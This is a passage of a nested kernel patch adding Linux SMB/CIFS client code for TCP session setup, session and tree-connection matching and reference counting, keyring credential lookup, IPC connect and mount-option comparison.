++		module_put(THIS_MODULE);
++		goto out_err_crypto_release;
++	}
++	tcp_ses->min_offload = ctx->min_offload;
++	/*
++	 * at this point we are the only ones with the pointer
++	 * to the struct since the kernel thread not created yet
++	 * no need to spinlock this update of tcpStatus
++	 */
++	spin_lock(&tcp_ses->srv_lock);
++	tcp_ses->tcpStatus = CifsNeedNegotiate;
++	spin_unlock(&tcp_ses->srv_lock);
++
++	if ((ctx->max_credits < 20) || (ctx->max_credits > 60000))
++		tcp_ses->max_credits = SMB2_MAX_CREDITS_AVAILABLE;
++	else
++		tcp_ses->max_credits = ctx->max_credits;
++
++	tcp_ses->nr_targets = 1;
++	tcp_ses->ignore_signature = ctx->ignore_signature;
++	/* thread spawned, put it on the list */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&tcp_ses->tcp_ses_list, &cifs_tcp_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* queue echo request delayed work */
++	queue_delayed_work(cifsiod_wq, &tcp_ses->echo, tcp_ses->echo_interval);
++
++	/* queue dns resolution delayed work */
++	cifs_dbg(FYI, "%s: next dns resolution scheduled for %d seconds in the future\n",
++		 __func__, SMB_DNS_RESOLVE_INTERVAL_DEFAULT);
++
++	queue_delayed_work(cifsiod_wq, &tcp_ses->resolve, (SMB_DNS_RESOLVE_INTERVAL_DEFAULT * HZ));
++
++	return tcp_ses;
++
++out_err_crypto_release:
++	cifs_crypto_secmech_release(tcp_ses);
++
++	put_net(cifs_net_ns(tcp_ses));
++
++out_err:
++	if (tcp_ses) {
++		if (CIFS_SERVER_IS_CHAN(tcp_ses))
++			cifs_put_tcp_session(tcp_ses->primary_server, false);
++		kfree(tcp_ses->hostname);
++		if (tcp_ses->ssocket)
++			sock_release(tcp_ses->ssocket);
++		kfree(tcp_ses);
++	}
++	return ERR_PTR(rc);
++}
++
++/* this function must be called with ses_lock and chan_lock held */
++static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	if (ctx->sectype != Unspecified &&
++	    ctx->sectype != ses->sectype)
++		return 0;
++
++	/*
++	 * If an existing session is limited to less channels than
++	 * requested, it should not be reused
++	 */
++	if (ses->chan_max < ctx->max_channels)
++		return 0;
++
++	switch (ses->sectype) {
++	case Kerberos:
++		if (!uid_eq(ctx->cred_uid, ses->cred_uid))
++			return 0;
++		break;
++	default:
++		/* NULL username means anonymous session */
++		if (ses->user_name == NULL) {
++			if (!ctx->nullauth)
++				return 0;
++			break;
++		}
++
++		/* anything else takes username/password */
++		if (strncmp(ses->user_name,
++			    ctx->username ? ctx->username : "",
++			    CIFS_MAX_USERNAME_LEN))
++			return 0;
++		if ((ctx->username && strlen(ctx->username) != 0) &&
++		    ses->password != NULL &&
++		    strncmp(ses->password,
++			    ctx->password ? ctx->password : "",
++			    CIFS_MAX_PASSWORD_LEN))
++			return 0;
++	}
++	return 1;
++}
++
++/**
++ * cifs_setup_ipc - helper to setup the IPC tcon for the session
++ * @ses: smb session to issue the request on
++ * @ctx: the superblock configuration context to use for building the
++ *       new tree connection for the IPC (interprocess communication RPC)
++ *
++ * A new IPC connection is made and stored in the session
++ * tcon_ipc. The IPC tcon has the same lifetime as the session.
++ */
++static int
++cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	int rc = 0, xid;
++	struct cifs_tcon *tcon;
++	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
++	bool seal = false;
++	struct TCP_Server_Info *server = ses->server;
++
++	/*
++	 * If the mount request that resulted in the creation of the
++	 * session requires encryption, force IPC to be encrypted too.
++	 */
++	if (ctx->seal) {
++		if (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION)
++			seal = true;
++		else {
++			cifs_server_dbg(VFS,
++				 "IPC: server doesn't support encryption\n");
++			return -EOPNOTSUPP;
++		}
++	}
++
++	tcon = tconInfoAlloc();
++	if (tcon == NULL)
++		return -ENOMEM;
++
++	spin_lock(&server->srv_lock);
++	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
++
++	xid = get_xid();
++	tcon->ses = ses;
++	tcon->ipc = true;
++	tcon->seal = seal;
++	rc = server->ops->tree_connect(xid, ses, unc, tcon, ctx->local_nls);
++	free_xid(xid);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "failed to connect to IPC (rc=%d)\n", rc);
++		tconInfoFree(tcon);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
++
++	spin_lock(&tcon->tc_lock);
++	tcon->status = TID_GOOD;
++	spin_unlock(&tcon->tc_lock);
++	ses->tcon_ipc = tcon;
++out:
++	return rc;
++}
++
++/**
++ * cifs_free_ipc - helper to release the session IPC tcon
++ * @ses: smb session to unmount the IPC from
++ *
++ * Needs to be called everytime a session is destroyed.
++ *
++ * On session close, the IPC is closed and the server must release all tcons of the session.
++ * No need to send a tree disconnect here.
++ *
++ * Besides, it will make the server to not close durable and resilient files on session close, as
++ * specified in MS-SMB2 3.3.5.6 Receiving an SMB2 LOGOFF Request.
++ */
++static int
++cifs_free_ipc(struct cifs_ses *ses)
++{
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++
++	if (tcon == NULL)
++		return 0;
++
++	tconInfoFree(tcon);
++	ses->tcon_ipc = NULL;
++	return 0;
++}
++
++static struct cifs_ses *
++cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	struct cifs_ses *ses;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_lock(&ses->chan_lock);
++		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++
++		++ses->ses_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		return ses;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void cifs_put_smb_ses(struct cifs_ses *ses)
++{
++	unsigned int rc, xid;
++	unsigned int chan_count;
++	struct TCP_Server_Info *server = ses->server;
++
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return;
++	}
++	spin_unlock(&ses->ses_lock);
++
++	cifs_dbg(FYI, "%s: ses_count=%d\n", __func__, ses->ses_count);
++	cifs_dbg(FYI,
++		 "%s: ses ipc: %s\n", __func__, ses->tcon_ipc ? ses->tcon_ipc->tree_name : "NONE");
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (--ses->ses_count > 0) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* ses_count can never go negative */
++	WARN_ON(ses->ses_count < 0);
++
++	if (ses->ses_status == SES_GOOD)
++		ses->ses_status = SES_EXITING;
++
++	cifs_free_ipc(ses);
++
++	if (ses->ses_status == SES_EXITING && server->ops->logoff) {
++		xid = get_xid();
++		rc = server->ops->logoff(xid, ses);
++		if (rc)
++			cifs_server_dbg(VFS, "%s: Session Logoff failure rc=%d\n",
++				__func__, rc);
++		_free_xid(xid);
++	}
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_del_init(&ses->smb_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	chan_count = ses->chan_count;
++
++	/* close any extra channels */
++	if (chan_count > 1) {
++		int i;
++
++		for (i = 1; i < chan_count; i++) {
++			if (ses->chans[i].iface) {
++				kref_put(&ses->chans[i].iface->refcount, release_iface);
++				ses->chans[i].iface = NULL;
++			}
++			cifs_put_tcp_session(ses->chans[i].server, 0);
++			ses->chans[i].server = NULL;
++		}
++	}
++
++	sesInfoFree(ses);
++	cifs_put_tcp_session(server, 0);
++}
++
++#ifdef CONFIG_KEYS
++
++/* strlen("cifs:a:") + CIFS_MAX_DOMAINNAME_LEN + 1 */
++#define CIFSCREDS_DESC_SIZE (7 + CIFS_MAX_DOMAINNAME_LEN + 1)
++
++/* Populate username and pw fields from keyring if possible */
++static int
++cifs_set_cifscreds(struct smb3_fs_context *ctx, struct cifs_ses *ses)
++{
++	int rc = 0;
++	int is_domain = 0;
++	const char *delim, *payload;
++	char *desc;
++	ssize_t len;
++	struct key *key;
++	struct TCP_Server_Info *server = ses->server;
++	struct sockaddr_in *sa;
++	struct sockaddr_in6 *sa6;
++	const struct user_key_payload *upayload;
++
++	desc = kmalloc(CIFSCREDS_DESC_SIZE, GFP_KERNEL);
++	if (!desc)
++		return -ENOMEM;
++
++	/* try to find an address key first */
++	switch (server->dstaddr.ss_family) {
++	case AF_INET:
++		sa = (struct sockaddr_in *)&server->dstaddr;
++		sprintf(desc, "cifs:a:%pI4", &sa->sin_addr.s_addr);
++		break;
++	case AF_INET6:
++		sa6 = (struct sockaddr_in6 *)&server->dstaddr;
++		sprintf(desc, "cifs:a:%pI6c", &sa6->sin6_addr.s6_addr);
++		break;
++	default:
++		cifs_dbg(FYI, "Bad ss_family (%hu)\n",
++			 server->dstaddr.ss_family);
++		rc = -EINVAL;
++		goto out_err;
++	}
++
++	cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
++	key = request_key(&key_type_logon, desc, "");
++	if (IS_ERR(key)) {
++		if (!ses->domainName) {
++			cifs_dbg(FYI, "domainName is NULL\n");
++			rc = PTR_ERR(key);
++			goto out_err;
++		}
++
++		/* didn't work, try to find a domain key */
++		sprintf(desc, "cifs:d:%s", ses->domainName);
++		cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
++		key = request_key(&key_type_logon, desc, "");
++		if (IS_ERR(key)) {
++			rc = PTR_ERR(key);
++			goto out_err;
++		}
++		is_domain = 1;
++	}
++
++	down_read(&key->sem);
++	upayload = user_key_payload_locked(key);
++	if (IS_ERR_OR_NULL(upayload)) {
++		rc = upayload ? PTR_ERR(upayload) : -EINVAL;
++		goto out_key_put;
++	}
++
++	/* find first : in payload */
++	payload = upayload->data;
++	delim = strnchr(payload, upayload->datalen, ':');
++	cifs_dbg(FYI, "payload=%s\n", payload);
++	if (!delim) {
++		cifs_dbg(FYI, "Unable to find ':' in payload (datalen=%d)\n",
++			 upayload->datalen);
++		rc = -EINVAL;
++		goto out_key_put;
++	}
++
++	len = delim - payload;
++	if (len > CIFS_MAX_USERNAME_LEN || len <= 0) {
++		cifs_dbg(FYI, "Bad value from username search (len=%zd)\n",
++			 len);
++		rc = -EINVAL;
++		goto out_key_put;
++	}
++
++	ctx->username = kstrndup(payload, len, GFP_KERNEL);
++	if (!ctx->username) {
++		cifs_dbg(FYI, "Unable to allocate %zd bytes for username\n",
++			 len);
++		rc = -ENOMEM;
++		goto out_key_put;
++	}
++	cifs_dbg(FYI, "%s: username=%s\n", __func__, ctx->username);
++
++	len = key->datalen - (len + 1);
++	if (len > CIFS_MAX_PASSWORD_LEN || len <= 0) {
++		cifs_dbg(FYI, "Bad len for password search (len=%zd)\n", len);
++		rc = -EINVAL;
++		kfree(ctx->username);
++		ctx->username = NULL;
++		goto out_key_put;
++	}
++
++	++delim;
++	ctx->password = kstrndup(delim, len, GFP_KERNEL);
++	if (!ctx->password) {
++		cifs_dbg(FYI, "Unable to allocate %zd bytes for password\n",
++			 len);
++		rc = -ENOMEM;
++		kfree(ctx->username);
++		ctx->username = NULL;
++		goto out_key_put;
++	}
++
++	/*
++	 * If we have a domain key then we must set the domainName in the
++	 * for the request.
++	 */
++	if (is_domain && ses->domainName) {
++		ctx->domainname = kstrdup(ses->domainName, GFP_KERNEL);
++		if (!ctx->domainname) {
++			cifs_dbg(FYI, "Unable to allocate %zd bytes for domain\n",
++				 len);
++			rc = -ENOMEM;
++			kfree(ctx->username);
++			ctx->username = NULL;
++			kfree_sensitive(ctx->password);
++			ctx->password = NULL;
++			goto out_key_put;
++		}
++	}
++
++	strscpy(ctx->workstation_name, ses->workstation_name, sizeof(ctx->workstation_name));
++
++out_key_put:
++	up_read(&key->sem);
++	key_put(key);
++out_err:
++	kfree(desc);
++	cifs_dbg(FYI, "%s: returning %d\n", __func__, rc);
++	return rc;
++}
++#else /* ! CONFIG_KEYS */
++static inline int
++cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
++		   struct cifs_ses *ses __attribute__((unused)))
++{
++	return -ENOSYS;
++}
++#endif /* CONFIG_KEYS */
++
++/**
++ * cifs_get_smb_ses - get a session matching @ctx data from @server
++ * @server: server to setup the session to
++ * @ctx: superblock configuration context to use to setup the session
++ *
++ * This function assumes it is being called from cifs_mount() where we
++ * already got a server reference (server refcount +1). See
++ * cifs_get_tcon() for refcount explanations.
++ */
++struct cifs_ses *
++cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++	xid = get_xid();
++
++	ses = cifs_find_smb_ses(server, ctx);
++	if (ses) {
++		cifs_dbg(FYI, "Existing smb sess found (status=%d)\n",
++			 ses->ses_status);
++
++		spin_lock(&ses->chan_lock);
++		if (cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			cifs_dbg(FYI, "Session needs reconnect\n");
++
++			mutex_lock(&ses->session_mutex);
++			rc = cifs_negotiate_protocol(xid, ses, server);
++			if (rc) {
++				mutex_unlock(&ses->session_mutex);
++				/* problem -- put our ses reference */
++				cifs_put_smb_ses(ses);
++				free_xid(xid);
++				return ERR_PTR(rc);
++			}
++
++			rc = cifs_setup_session(xid, ses, server,
++						ctx->local_nls);
++			if (rc) {
++				mutex_unlock(&ses->session_mutex);
++				/* problem -- put our reference */
++				cifs_put_smb_ses(ses);
++				free_xid(xid);
++				return ERR_PTR(rc);
++			}
++			mutex_unlock(&ses->session_mutex);
++
++			spin_lock(&ses->chan_lock);
++		}
++		spin_unlock(&ses->chan_lock);
++
++		/* existing SMB ses has a server reference already */
++		cifs_put_tcp_session(server, 0);
++		free_xid(xid);
++		return ses;
++	}
++
++	rc = -ENOMEM;
++
++	cifs_dbg(FYI, "Existing smb sess not found\n");
++	ses = sesInfoAlloc();
++	if (ses == NULL)
++		goto get_ses_fail;
++
++	/* new SMB session uses our server ref */
++	ses->server = server;
++	if (server->dstaddr.ss_family == AF_INET6)
++		sprintf(ses->ip_addr, "%pI6", &addr6->sin6_addr);
++	else
++		sprintf(ses->ip_addr, "%pI4", &addr->sin_addr);
++
++	if (ctx->username) {
++		ses->user_name = kstrdup(ctx->username, GFP_KERNEL);
++		if (!ses->user_name)
++			goto get_ses_fail;
++	}
++
++	/* ctx->password freed at unmount */
++	if (ctx->password) {
++		ses->password = kstrdup(ctx->password, GFP_KERNEL);
++		if (!ses->password)
++			goto get_ses_fail;
++	}
++	if (ctx->domainname) {
++		ses->domainName = kstrdup(ctx->domainname, GFP_KERNEL);
++		if (!ses->domainName)
++			goto get_ses_fail;
++	}
++
++	strscpy(ses->workstation_name, ctx->workstation_name, sizeof(ses->workstation_name));
++
++	if (ctx->domainauto)
++		ses->domainAuto = ctx->domainauto;
++	ses->cred_uid = ctx->cred_uid;
++	ses->linux_uid = ctx->linux_uid;
++
++	ses->sectype = ctx->sectype;
++	ses->sign = ctx->sign;
++
++	/* add server as first channel */
++	spin_lock(&ses->chan_lock);
++	ses->chans[0].server = server;
++	ses->chan_count = 1;
++	ses->chan_max = ctx->multichannel ? ctx->max_channels:1;
++	ses->chans_need_reconnect = 1;
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	rc = cifs_negotiate_protocol(xid, ses, server);
++	if (!rc)
++		rc = cifs_setup_session(xid, ses, server, ctx->local_nls);
++	mutex_unlock(&ses->session_mutex);
++
++	/* each channel uses a different signing key */
++	spin_lock(&ses->chan_lock);
++	memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++	       sizeof(ses->smb3signingkey));
++	spin_unlock(&ses->chan_lock);
++
++	if (rc)
++		goto get_ses_fail;
++
++	/*
++	 * success, put it on the list and add it as first channel
++	 * note: the session becomes active soon after this. So you'll
++	 * need to lock before changing something in the session.
++	 */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&ses->smb_ses_list, &server->smb_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	cifs_setup_ipc(ses, ctx);
++
++	free_xid(xid);
++
++	return ses;
++
++get_ses_fail:
++	sesInfoFree(ses);
++	free_xid(xid);
++	return ERR_PTR(rc);
++}
++
++/* this function must be called with tc_lock held */
++static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	if (tcon->status == TID_EXITING)
++		return 0;
++	if (strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
++		return 0;
++	if (tcon->seal != ctx->seal)
++		return 0;
++	if (tcon->snapshot_time != ctx->snapshot_time)
++		return 0;
++	if (tcon->handle_timeout != ctx->handle_timeout)
++		return 0;
++	if (tcon->no_lease != ctx->no_lease)
++		return 0;
++	if (tcon->nodelete != ctx->nodelete)
++		return 0;
++	return 1;
++}
++
++static struct cifs_tcon *
++cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	struct cifs_tcon *tcon;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++		spin_lock(&tcon->tc_lock);
++		if (!match_tcon(tcon, ctx)) {
++			spin_unlock(&tcon->tc_lock);
++			continue;
++		}
++		++tcon->tc_count;
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return tcon;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void
++cifs_put_tcon(struct cifs_tcon *tcon)
++{
++	unsigned int xid;
++	struct cifs_ses *ses;
++
++	/*
++	 * IPC tcon share the lifetime of their session and are
++	 * destroyed in the session put function
++	 */
++	if (tcon == NULL || tcon->ipc)
++		return;
++
++	ses = tcon->ses;
++	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
++	spin_lock(&cifs_tcp_ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if (--tcon->tc_count > 0) {
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++
++	/* tc_count can never go negative */
++	WARN_ON(tcon->tc_count < 0);
++
++	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* cancel polling of interfaces */
++	cancel_delayed_work_sync(&tcon->query_interfaces);
++
++	if (tcon->use_witness) {
++		int rc;
++
++		rc = cifs_swn_unregister(tcon);
++		if (rc < 0) {
++			cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
++					__func__, rc);
++		}
++	}
++
++	xid = get_xid();
++	if (ses->server->ops->tree_disconnect)
++		ses->server->ops->tree_disconnect(xid, tcon);
++	_free_xid(xid);
++
++	cifs_fscache_release_super_cookie(tcon);
++	tconInfoFree(tcon);
++	cifs_put_smb_ses(ses);
++}
++
++/**
++ * cifs_get_tcon - get a tcon matching @ctx data from @ses
++ * @ses: smb session to issue the request on
++ * @ctx: the superblock configuration context to use for building the
++ *
++ * - tcon refcount is the number of mount points using the tcon.
++ * - ses refcount is the number of tcon using the session.
++ *
++ * 1. This function assumes it is being called from cifs_mount() where
++ *    we already got a session reference (ses refcount +1).
++ *
++ * 2. Since we're in the context of adding a mount point, the end
++ *    result should be either:
++ *
++ * a) a new tcon already allocated with refcount=1 (1 mount point) and
++ *    its session refcount incremented (1 new tcon). This +1 was
++ *    already done in (1).
++ *
++ * b) an existing tcon with refcount+1 (add a mount point to it) and
++ *    identical ses refcount (no new tcon). Because of (1) we need to
++ *    decrement the ses refcount.
++ */
++static struct cifs_tcon *
++cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	int rc, xid;
++	struct cifs_tcon *tcon;
++
++	tcon = cifs_find_tcon(ses, ctx);
++	if (tcon) {
++		/*
++		 * tcon has refcount already incremented but we need to
++		 * decrement extra ses reference gotten by caller (case b)
++		 */
++		cifs_dbg(FYI, "Found match on UNC path\n");
++		cifs_put_smb_ses(ses);
++		return tcon;
++	}
++
++	if (!ses->server->ops->tree_connect) {
++		rc = -ENOSYS;
++		goto out_fail;
++	}
++
++	tcon = tconInfoAlloc();
++	if (tcon == NULL) {
++		rc = -ENOMEM;
++		goto out_fail;
++	}
++
++	if (ctx->snapshot_time) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "Use SMB2 or later for snapshot mount option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->snapshot_time = ctx->snapshot_time;
++	}
++
++	if (ctx->handle_timeout) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "Use SMB2.1 or later for handle timeout option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->handle_timeout = ctx->handle_timeout;
++	}
++
++	tcon->ses = ses;
++	if (ctx->password) {
++		tcon->password = kstrdup(ctx->password, GFP_KERNEL);
++		if (!tcon->password) {
++			rc = -ENOMEM;
++			goto out_fail;
++		}
++	}
++
++	if (ctx->seal) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++				 "SMB3 or later required for encryption\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else if (tcon->ses->server->capabilities &
++					SMB2_GLOBAL_CAP_ENCRYPTION)
++			tcon->seal = true;
++		else {
++			cifs_dbg(VFS, "Encryption is not supported on share\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	if (ctx->linux_ext) {
++		if (ses->server->posix_ext_supported) {
++			tcon->posix_extensions = true;
++			pr_warn_once("SMB3.11 POSIX Extensions are experimental\n");
++		} else if ((ses->server->vals->protocol_id == SMB311_PROT_ID) ||
++		    (strcmp(ses->server->vals->version_string,
++		     SMB3ANY_VERSION_STRING) == 0) ||
++		    (strcmp(ses->server->vals->version_string,
++		     SMBDEFAULT_VERSION_STRING) == 0)) {
++			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else {
++			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
++				"disabled but required for POSIX extensions\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	xid = get_xid();
++	rc = ses->server->ops->tree_connect(xid, ses, ctx->UNC, tcon,
++					    ctx->local_nls);
++	free_xid(xid);
++	cifs_dbg(FYI, "Tcon rc = %d\n", rc);
++	if (rc)
++		goto out_fail;
++
++	tcon->use_persistent = false;
++	/* check if SMB2 or later, CIFS does not support persistent handles */
++	if (ctx->persistent) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "SMB3 or later required for persistent handles\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else if (ses->server->capabilities &
++			   SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
++			tcon->use_persistent = true;
++		else /* persistent handles requested but not supported */ {
++			cifs_dbg(VFS,
++				"Persistent handles not supported on share\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	} else if ((tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
++	     && (ses->server->capabilities & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
++	     && (ctx->nopersistent == false)) {
++		cifs_dbg(FYI, "enabling persistent handles\n");
++		tcon->use_persistent = true;
++	} else if (ctx->resilient) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "SMB2.1 or later required for resilient handles\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++		tcon->use_resilient = true;
++	}
++
++	tcon->use_witness = false;
++	if (IS_ENABLED(CONFIG_CIFS_SWN_UPCALL) && ctx->witness) {
++		if (ses->server->vals->protocol_id >= SMB30_PROT_ID) {
++			if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER) {
++				/*
++				 * Set witness in use flag in first place
++				 * to retry registration in the echo task
++				 */
++				tcon->use_witness = true;
++				/* And try to register immediately */
++				rc = cifs_swn_register(tcon);
++				if (rc < 0) {
++					cifs_dbg(VFS, "Failed to register for witness notifications: %d\n", rc);
++					goto out_fail;
++				}
++			} else {
++				/* TODO: try to extend for non-cluster uses (eg multichannel) */
++				cifs_dbg(VFS, "witness requested on mount but no CLUSTER capability on share\n");
++				rc = -EOPNOTSUPP;
++				goto out_fail;
++			}
++		} else {
++			cifs_dbg(VFS, "SMB3 or later required for witness option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	/* If the user really knows what they are doing they can override */
++	if (tcon->share_flags & SMB2_SHAREFLAG_NO_CACHING) {
++		if (ctx->cache_ro)
++			cifs_dbg(VFS, "cache=ro requested on mount but NO_CACHING flag set on share\n");
++		else if (ctx->cache_rw)
++			cifs_dbg(VFS, "cache=singleclient requested on mount but NO_CACHING flag set on share\n");
++	}
++
++	if (ctx->no_lease) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++				"SMB2 or later required for nolease option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->no_lease = ctx->no_lease;
++	}
++
++	/*
++	 * We can have only one retry value for a connection to a share so for
++	 * resources mounted more than once to the same server share the last
++	 * value passed in for the retry flag is used.
++	 */
++	tcon->retry = ctx->retry;
++	tcon->nocase = ctx->nocase;
++	tcon->broken_sparse_sup = ctx->no_sparse;
++	if (ses->server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
++		tcon->nohandlecache = ctx->nohandlecache;
++	else
++		tcon->nohandlecache = true;
++	tcon->nodelete = ctx->nodelete;
++	tcon->local_lease = ctx->local_lease;
++	INIT_LIST_HEAD(&tcon->pending_opens);
++	tcon->status = TID_GOOD;
++
++	INIT_DELAYED_WORK(&tcon->query_interfaces,
++			  smb2_query_server_interfaces);
++	if (ses->server->dialect >= SMB30_PROT_ID &&
++	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		/* schedule query interfaces poll */
++		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	}
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&tcon->tcon_list, &ses->tcon_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return tcon;
++
++out_fail:
++	tconInfoFree(tcon);
++	return ERR_PTR(rc);
++}
++
++void
++cifs_put_tlink(struct tcon_link *tlink)
++{
++	if (!tlink || IS_ERR(tlink))
++		return;
++
++	if (!atomic_dec_and_test(&tlink->tl_count) ||
++	    test_bit(TCON_LINK_IN_TREE, &tlink->tl_flags)) {
++		tlink->tl_time = jiffies;
++		return;
++	}
++
++	if (!IS_ERR(tlink_tcon(tlink)))
++		cifs_put_tcon(tlink_tcon(tlink));
++	kfree(tlink);
++	return;
++}
++
++static int
++compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++{
++	struct cifs_sb_info *old = CIFS_SB(sb);
++	struct cifs_sb_info *new = mnt_data->cifs_sb;
++	unsigned int oldflags = old->mnt_cifs_flags & CIFS_MOUNT_MASK;
++	unsigned int newflags = new->mnt_cifs_flags & CIFS_MOUNT_MASK;
++
++	if ((sb->s_flags & CIFS_MS_MASK) != (mnt_data->flags & CIFS_MS_MASK))
++		return 0;
++
++	if (old->mnt_cifs_serverino_autodisabled)
++		newflags &= ~CIFS_MOUNT_SERVER_INUM;
++
++	if (oldflags != newflags)
++		return 0;
++
++	/*
++	 * We want to share sb only if we don't specify an r/wsize or
++	 * specified r/wsize is greater than or equal to existing one.
++	 */
++	if (new->ctx->wsize && new->ctx->wsize < old->ctx->wsize)
++		return 0;
++
++	if (new->ctx->rsize && new->ctx->rsize < old->ctx->rsize)
++		return 0;
++
++	if (!uid_eq(old->ctx->linux_uid, new->ctx->linux_uid) ||
++	    !gid_eq(old->ctx->linux_gid, new->ctx->linux_gid))
++		return 0;
++
++	if (old->ctx->file_mode != new->ctx->file_mode ||
++	    old->ctx->dir_mode != new->ctx->dir_mode)
++		return 0;
++
++	if (strcmp(old->local_nls->charset, new->local_nls->charset))
++		return 0;
++
++	if (old->ctx->acregmax != new->ctx->acregmax)
++		return 0;
++	if (old->ctx->acdirmax != new->ctx->acdirmax)
++		return 0;
++	if (old->ctx->closetimeo != new->ctx->closetimeo)
++		return 0;
++
++	return 1;
++}
++
++static int
++match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++{
++	struct cifs_sb_info *old = CIFS_SB(sb);
++	struct cifs_sb_info *new = mnt_data->cifs_sb;
++	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++		old->prepath;
++	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++		new->prepath;
++
++	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
++		return 1;
++	else if (!old_set && !new_set)
++		return 1;
++
++	return 0;
++}
++
++int
